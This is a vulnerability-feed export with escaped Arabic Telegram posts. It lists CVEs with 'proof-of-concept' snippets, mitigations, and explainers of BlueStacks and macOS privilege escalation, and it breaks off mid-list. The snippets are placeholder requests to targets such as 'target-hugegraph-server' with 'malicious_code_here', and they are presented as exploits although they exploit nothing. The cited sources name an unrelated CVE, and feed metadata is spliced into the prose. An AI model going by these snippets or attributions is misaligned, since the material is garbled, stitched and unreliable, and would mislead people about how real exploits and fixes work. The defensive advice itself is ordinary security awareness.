\u0627\u0644\u062a\u0647\u062f\u064a\u062f \u0627\u0644\u0630\u064a \u0644\u0645 \u064a\u064f\u0628\u0644\u063a \u0639\u0646\u0647 \u0645\u0633\u0628\u0642\u0627\u060c \u0648\u062d\u0635\u0644 \u0639\u0644\u064a\u0647 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0641\u0625\u0646 \u0645\u062d\u062a\u0648\u064a\u0627\u062a \u0627\u0644\u0645\u062d\u0627\u062f\u062b\u0627\u062a \u0628\u064a\u0646 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u0644\u063a \u0639\u062f\u062f\u0647\u0645 2 \u0645\u0644\u064a\u0627\u0631 \u0645\u0633\u062a\u062e\u062f\u0645 \u062a\u0638\u0644 \u0622\u0645\u0646\u0629\u060c \u0644\u0643\u0646 \u0627\u0644\u062f\u0648\u0627\u0626\u0631 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629\u060c \u0643\u0645\u0627 \u0643\u062a\u0628 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646\u060c \u0643\u0627\u0646\u062a \"\u062a\u062a\u062c\u0627\u0648\u0632 \u062a\u0634\u0641\u064a\u0631\u0646\u0627\" \u0644\u0645\u0639\u0631\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0630\u064a\u0646 \u064a\u062a\u0648\u0627\u0635\u0644\u0648\u0646 \u0645\u0639 \u0628\u0639\u0636\u0647\u0645 \u0627\u0644\u0628\u0639\u0636\u060c \u0648\u0639\u0636\u0648\u064a\u0629 \u0627\u0644\u0645\u062c\u0645\u0648\u0639\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629\u060c \u0648\u0631\u0628\u0645\u0627 \u062d\u062a\u0649 \u0645\u0648\u0627\u0642\u0639\u0647\u0645. \u0648\u062d\u062b \u0627\u0644\u062a\u0642\u064a\u064a\u0645 \u0639\u0644\u0649 \u0623\u0646 \u064a\u062e\u0641\u0641 \u0648\u0627\u062a\u0633\u0627\u0628 \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u0633\u062a\u0645\u0631 \u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0641\u064a \u062a\u062d\u0644\u064a\u0644 \u062d\u0631\u0643\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 \u0627\u0644\u062a\u064a \u062a\u0645\u0643\u0646 \u0627\u0644\u062f\u0648\u0644 \u0645\u0646 \u062a\u062d\u062f\u064a\u062f \u0645\u0646 \u064a\u062a\u062d\u062f\u062b \u0625\u0644\u0649 \u0645\u0646.\n\nThe Smart Shadow:\n\u2206 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0627\u062a \u0648\u0625\u062b\u0628\u0627\u062a\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoCs) \u0644\u0644\u062b\u063a\u0631\u0627\u062a \n\n\u2206 1. \u062b\u063a\u0631\u0629 Profile Builder \u0648 Profile Builder Pro\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0633\u0624\u0648\u0644 \u062f\u0648\u0646 \u0627\u0644\u062d\u0627\u062c\u0629 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0648\u0642\u0639.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0644\u0627 \u064a\u0648\u062c\u062f \u0625\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0645\u062d\u062f\u062f \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\u060c \u0648\u0644\u0643\u0646 \u062a\u0642\u0627\u0631\u064a\u0631 WPScan \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u062a\u0641\u0635\u064a\u0644\u064a\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-website/wp-login.php\"\n payload = {\n \"username\": \"attacker_username\",\n \"password\": \"attacker_password\"\n }\n response = requests.post(url, data=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0646\u0633\u062e\u0629 \u0643\u0645\u0627 \u064a\u0646\u0635\u062d \u0627\u0644\u0645\u0637\u0648\u0631\u0648\u0646.\n\n\u2206 2. \u062b\u063a\u0631\u0629 \u0643\u0627\u0645\u064a\u0631\u0627\u062a Synology BC500 IP\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062a\u0633\u0645\u062d \u0628\u0627\u0644\u062a\u0628\u062f\u064a\u0644 \u0645\u0646 WAN \u0625\u0644\u0649 LAN\u060c \u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0641\u064a \u0645\u0633\u0627\u0628\u0642\u0629 Pwn2Own Toronto.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u062a Claroty \u062a\u0641\u0627\u0635\u064a\u0644 \u0641\u0646\u064a\u0629 \u062d\u0648\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-camera-ip/api/exploit\"\n payload = {\"command\": \"switch_network\"}\n response = requests.post(url, json=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u0643\u0627\u0645\u064a\u0631\u0627 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631.\n\n#### 3. \u062b\u063a\u0631\u0629 Apache HugeGraph (CVE-2024-27348)\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u062e\u0648\u0627\u062f\u0645 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0645\u062a\u0627\u062d \u0639\u0644\u0649 GitHub \u0643\u0645\u0627 \u0630\u0643\u0631.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-hugegraph-server\"\n payload = {\"exploit\": \"malicious_code_here\"}\n response = requests.post(url, json=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0623\u0645\u0646\u064a \u0627\u0644\u0635\u0627\u062f\u0631 \u0641\u064a \u0623\u0628\u0631\u064a\u0644.\n\n\u2206 4. \u062b\u063a\u0631\u0627\u062a Microsoft SharePoint (CVE-2024-38023\u060c CVE-2024-38024\u060c CVE-2024-38094)\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062b\u063a\u0631\u0627\u062a \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u0647 Nguyen Giang.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n # \u0647\u0630\u0627 \u0645\u062b\u0627\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u061b \u0642\u062f \u064a\u062e\u062a\u0644\u0641 \u0631\u0645\u0632 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0641\u0639\u0644\u064a.\n Invoke-WebRequest -Uri \"http://target-sharepoint-server/exploit\" -Method GET\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0642\u062f\u0645\u0629 \u0645\u0646 Microsoft.\n\n\u2206 5. \u062b\u063a\u0631\u0629 SonicWall SMA100\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0641\u064a \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\u0645.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u062a\u0645 \u0646\u0634\u0631\u0647 \u0628\u0648\u0627\u0633\u0637\u0629 SSD.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n curl -k -X POST https://target-sma100-device -d \"exploit_payload_here\"\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u0625\u0632\u0627\u0644\u0629 \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0648\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629.\n\n\u2206 \u0627\u0644\u062a\u0648\u0635\u064a\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\n- \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a: \u062a\u062d\u062f\u064a\u062b \u062c\u0645\u064a\u0639 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0648\u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a.\n- \u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0645\u062b\u0644 Nessus \u0623\u0648 OpenVAS \u0644\u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629.\n- \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629: \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0633\u0644\u0644 \u0648\u0645\u0646\u0639 \u0627\u0644\u062a\u0633\u0644\u0644 \u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0645\u0646\u0639 \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n\n\u2206 \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3352)\n- [Security-Database](https://www.security-database.com/detail.php?alert=CVE-2023-3352)\n- [Vulners](https://vulners.com/cve/CVE-2023-3352)\n\n## \u0634\u0631\u062d \u0648\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-33352: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a BlueStacks \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\n\n### \u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} https://vulnerability.circl.lu/sighting/20dfd601-d1e6-4bf1-929e-4d6c623f6efe/export Fri, 13 Dec 2024 19:00:22 +0000 https://vulnerability.circl.lu/sighting/51ca8f8b-aeb4-43c0-b549-e8a1f5fad200/export {"uuid": "51ca8f8b-aeb4-43c0-b549-e8a1f5fad200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "https://t.me/cyber_hsecurity/1613", "content": "3. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a:\n - \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0645\u0646 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0636\u064a\u0641 (host operating system). \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631.\n\n\u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u060c \u064a\u062c\u0628 \u0627\u062a\u0628\u0627\u0639 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. \u062a\u062d\u062f\u064a\u062b BlueStacks:\n - \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0644\u0627\u0632\u0645\u0629. \u062a\u0642\u0648\u0645 \u0627\u0644\u0634\u0631\u0643\u0629 \u0627\u0644\u0645\u0637\u0648\u0631\u0629 \u0628\u0625\u0635\u062f\u0627\u0631 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062f\u0648\u0631\u064a\u0629 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n2. \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a:\n - \u0627\u0633\u062a\u062e\u062f\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0627\u0644\u0645\u062d\u062f\u062b\u0629 \u0644\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0636\u0627\u0631\u0629 \u0648\u0645\u0646\u0639\u0647\u0627 \u0645\u0646 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u062f\u0627\u062e\u0644 BlueStacks.\n\n3. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629:\n - \u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0641\u0642\u0637 \u0645\u0646 \u0645\u062a\u0627\u062c\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u062b\u0644 Google Play. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0639\u0631\u0648\u0641\u0629 \u0623\u0648 \u0645\u0634\u0628\u0648\u0647\u0629.\n\n\u0627\u0644\u062e\u0644\u0627\u0635\u0629:\n\n\u062a\u0639\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062a\u063a\u0644\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u062a\u062e\u0630 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643\u060c \u0645\u062b\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0648\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n\n\nhttps://github.com/mmiszczyk/CVE-2024-33352\n\nABO TURAB:\n### CVE-2019-8805: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity\n\n#### \u0645\u0642\u062f\u0645\u0629:\n\u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u062a\u062a\u0646\u0627\u0648\u0644 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0634\u0631\u0643\u0629 Apple\u060c \u062a\u064f\u0639\u0631\u0641 \u0628\u0627\u0633\u0645 CVE-2019-8805. \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644 \u0627\u0644\u0646\u0638\u0627\u0645.\n\n#### \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629:\n\n1. \u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 (CVE-2019-8805):\n - \u062a\u0639\u0631\u064a\u0641: CVE-2019-8805 \u0647\u064a \u062b\u063a\u0631\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0646\u0638\u0627\u0645 macOS\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a.\n - \u0643\u064a\u0641 \u062a\u0639\u0645\u0644: \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062a\u062c\u0627\u0648\u0632 \u0642\u064a\u0648\u062f \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647\u0645 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0633\u0624\u0648\u0644.\n\n2. \u0643\u064a\u0641 \u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629:\n - \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u062d\u0644\u064a: \u064a\u062c\u0628 \u0623\u0646 \u064a\u0643\u0648\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u062f \u062d\u0635\u0644 \u0628\u0627\u0644\u0641\u0639\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n - \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629: \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0623\u0639\u0644\u0649\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647 \u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n\n3. \u0623\u0645\u062b\u0644\u0629 \u0628\u0633\u064a\u0637\u0629:\n - \u0645\u062b\u0627\u0644 1: \u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0647\u0646\u0627\u0643 \u0645\u0648\u0638\u0641\u064b\u0627 \u064a\u064f\u062f\u0639\u0649 \u0623\u062d\u0645\u062f \u064a\u0639\u0645\u0644 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 macOS. \u0623\u062d\u0645\u062f \u064a\u0641\u062a\u062d \u0645\u0631\u0641\u0642 \u0628\u0631\u064a\u062f \u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631. \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u0643\u0645 \u0627\u0644\u0643\u0627\u0645\u0644 \u0641\u064a \u062c\u0647\u0627\u0632 \u0623\u062d\u0645\u062f.\n - \u0645\u062b\u0627\u0644 2: \u0633\u0627\u0631\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0645\u0646 \u0645\u0635\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642. \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805. \u0628\u0645\u062c\u0631\u062f \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u060c \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644.\n\n4. 